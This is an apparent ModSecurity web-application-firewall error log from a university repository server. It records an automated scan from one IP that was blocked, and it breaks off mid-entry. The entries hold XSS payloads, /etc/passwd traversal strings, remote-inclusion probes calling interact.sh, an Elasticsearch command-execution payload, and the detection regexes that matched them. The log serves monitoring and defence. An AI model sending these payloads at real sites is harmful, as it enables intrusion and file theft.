[Tue Aug 29 11:56:23.628947 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArJXl4AAAAZ"]
[Tue Aug 29 11:56:24.724769 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArJXmgAAAAZ"]
[Tue Aug 29 11:56:25.630213 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArIAUMAAAAX"]
[Tue Aug 29 11:56:27.082597 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArC7loAAAAW"]
[Tue Aug 29 11:56:30.068219 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAAq5@RcAAAAK"]
[Tue Aug 29 11:56:30.607850 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAqsV90AAAAB"]
[Tue Aug 29 11:56:30.648107 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAq@slcAAAAM"]
[Tue Aug 29 11:56:33.600125 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAq-Hb8AAAAT"]
[Tue Aug 29 11:56:34.611006 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAArMmrsAAAAf"]
[Tue Aug 29 11:56:36.527979 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArHa4UAAAAJ"]
[Tue Aug 29 11:56:36.637527 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAocyk4AAAAR"]
[Tue Aug 29 11:56:38.722797 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAAqw52gAAAAH"]
[Tue Aug 29 11:56:39.550824 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAoz8MAAAAAS"]
[Tue Aug 29 11:56:39.818489 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArZPyYAAAAC"]
[Tue Aug 29 11:56:39.879207 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPykAAAAC"]
[Tue Aug 29 11:56:40.863066 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocyl0AAAAR"]
[Tue Aug 29 11:56:40.891129 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArIAXAAAAAX"]
[Tue Aug 29 11:56:42.851561 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAoz8NEAAAAS"]
[Tue Aug 29 11:56:43.655292 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArZPzkAAAAC"]
[Tue Aug 29 11:56:43.719384 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAqsWAwAAAAB"]
[Tue Aug 29 11:56:44.631828 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArZP0AAAAAC"]
[Tue Aug 29 11:56:45.596729 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:116323/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq-Hf0AAAAT"]
[Tue Aug 29 11:56:46.773367 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:289716/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAolK6AAAAAe"]
[Tue Aug 29 11:56:46.815873 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArZP1QAAAAC"]
[Tue Aug 29 11:56:47.559233 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAocyoUAAAAR"]
[Tue Aug 29 11:56:47.628092 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAqsWBoAAAAB"]
[Tue Aug 29 11:56:48.571625 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqqtlEAAAAA"]
[Tue Aug 29 11:56:48.720905 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAoz8OwAAAAS"]
[Tue Aug 29 11:56:50.700538 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAq-HhkAAAAT"]
[Tue Aug 29 11:56:51.734907 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: 